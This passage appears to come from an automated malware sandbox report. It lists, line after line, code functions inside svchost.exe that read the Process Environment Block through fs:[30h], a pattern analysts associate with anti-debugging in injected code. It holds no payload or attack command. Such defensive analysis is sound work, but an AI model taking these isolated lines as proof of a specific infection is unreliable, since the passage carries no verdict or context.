Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30750 mov eax, dword ptr fs:[00000030h]	2_2_03B30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBE75D mov eax, dword ptr fs:[00000030h]	2_2_03BBE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]	2_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72750 mov eax, dword ptr fs:[00000030h]	2_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB4755 mov eax, dword ptr fs:[00000030h]	2_2_03BB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6674D mov esi, dword ptr fs:[00000030h]	2_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]	2_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6674D mov eax, dword ptr fs:[00000030h]	2_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B666B0 mov eax, dword ptr fs:[00000030h]	2_2_03B666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]	2_2_03B6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]	2_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B34690 mov eax, dword ptr fs:[00000030h]	2_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	2_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	2_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]	2_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4E627 mov eax, dword ptr fs:[00000030h]	2_2_03B4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B66620 mov eax, dword ptr fs:[00000030h]	2_2_03B66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68620 mov eax, dword ptr fs:[00000030h]	2_2_03B68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3262C mov eax, dword ptr fs:[00000030h]	2_2_03B3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B72619 mov eax, dword ptr fs:[00000030h]	2_2_03B72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE609 mov eax, dword ptr fs:[00000030h]	2_2_03BAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4260B mov eax, dword ptr fs:[00000030h]	2_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B62674 mov eax, dword ptr fs:[00000030h]	2_2_03B62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]	2_2_03BF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF866E mov eax, dword ptr fs:[00000030h]	2_2_03BF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]	2_2_03B6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A660 mov eax, dword ptr fs:[00000030h]	2_2_03B6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B4C640 mov eax, dword ptr fs:[00000030h]	2_2_03B4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]	2_2_03B545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B545B1 mov eax, dword ptr fs:[00000030h]	2_2_03B545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	2_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E59C mov eax, dword ptr fs:[00000030h]	2_2_03B6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B32582 mov eax, dword ptr fs:[00000030h]	2_2_03B32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B32582 mov ecx, dword ptr fs:[00000030h]	2_2_03B32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B64588 mov eax, dword ptr fs:[00000030h]	2_2_03B64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B325E0 mov eax, dword ptr fs:[00000030h]	2_2_03B325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03B6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C5ED mov eax, dword ptr fs:[00000030h]	2_2_03B6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B365D0 mov eax, dword ptr fs:[00000030h]	2_2_03B365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03B6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_03B6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03B6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E5CF mov eax, dword ptr fs:[00000030h]	2_2_03B6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h]	2_2_03BC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]	2_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]	2_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]	2_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]	2_2_03B38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]	2_2_03B38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h]	2_2_03B644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]	2_2_03BBA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h]	2_2_03B364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEA49A mov eax, dword ptr fs:[00000030h]	2_2_03BEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h]	2_2_03B304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h]	2_2_03B6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]	2_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]	2_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]	2_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h]	2_2_03B2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]	2_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]	2_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]	2_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]	2_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]	2_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]	2_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h]	2_2_03BBC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEA456 mov eax, dword ptr fs:[00000030h]	2_2_03BEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h]	2_2_03B2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h]	2_2_03B5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]	2_2_03B40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]	2_2_03B40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_03BE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_03BE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h]	2_2_03B5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]	2_2_03BBCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]	2_2_03BDEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]	2_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]	2_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]	2_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]	2_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]	2_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]	2_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03B5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03B5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03BF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03BF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]	2_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]	2_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]	2_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]	2_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04B00 mov eax, dword ptr fs:[00000030h]	2_2_03C04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h]	2_2_03B2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28B50 mov eax, dword ptr fs:[00000030h]	2_2_03B28B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDEB50 mov eax, dword ptr fs:[00000030h]	2_2_03BDEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]	2_2_03BE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]	2_2_03BE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03BC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03BC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h]	2_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h]	2_2_03BD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03B38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03B38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h]	2_2_03B86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h]	2_2_03B68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h]	2_2_03C04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03B6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03B6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h]	2_2_03B30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03B64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03B64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]	2_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]	2_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]	2_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]	2_2_03B54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]	2_2_03B54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h]	2_2_03B6CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h]	2_2_03B6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h]	2_2_03B5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h]	2_2_03BBCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]	2_2_03BACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]	2_2_03BACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h]	2_2_03BDEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]	2_2_03B40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]	2_2_03B40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h]	2_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
